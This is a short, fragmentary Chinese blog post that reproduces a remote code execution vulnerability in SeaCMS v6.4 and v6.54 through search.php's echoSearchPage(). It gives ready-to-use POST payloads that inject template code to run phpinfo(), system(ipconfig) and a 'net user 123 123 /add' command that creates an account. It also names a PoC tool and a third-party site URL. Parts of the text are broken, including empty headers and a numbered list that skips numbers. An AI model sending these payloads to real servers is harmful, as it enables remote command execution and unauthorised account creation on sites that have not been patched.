赞
踩
前台:http://127.0.0.1/CMS/seacms_v6.4/upload/
后台:
复现结果:
http://127.0.0.1/CMS/seacms_v6.4/upload/search.php
post:searchtype=5&order=}{end if} {if:1)phpinfo();if(1}{end if}
1.漏洞的触发点是在search.php
中的echoSearchPage()
函数可以触发漏洞。常规的分析都是先找GET
、POST
的位置,在这个文件里面没有这些变量,原来是在./include/common.php
里面。
6.54
POST::
searchtype=5&searchword={if{searchpage:year}&year=:e{searchpage:area}}&area=v{searchpage:letter}&letter=al{searchpage:lang}&yuyan=(join{searchpage:jq}&jq=($_P{searchpage:ver}&&ver=OST[9]))&9[]=ph&9[]=pinfo();
命令执行:
searchtype=5&searchword={if{searchpage:year}&year=:e{searchpage:area}}&area=v{searchpage:letter}&letter=al{searchpage:lang}&yuyan=(join{searchpage:jq}&jq=($_P{searchpage:ver}&&ver=OST[9]))&9[]=sy&9[]=stem(ipconfig);
searchtype=5&searchword={if{searchpage:year}&year=:e{searchpage:area}}&area=v{searchpage:letter}&letter=al{searchpage:lang}&yuyan=(join{searchpage:jq}&jq=($_P{searchpage:ver}&&ver=OST[9]))&9[]=sy&9[]=stem("net user 123 123 /add");
海洋CMS V6.55
使用cmsPoc:
http://www.70vx.com/index.php
修复了漏洞
寻找其他漏洞点
参考:
Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。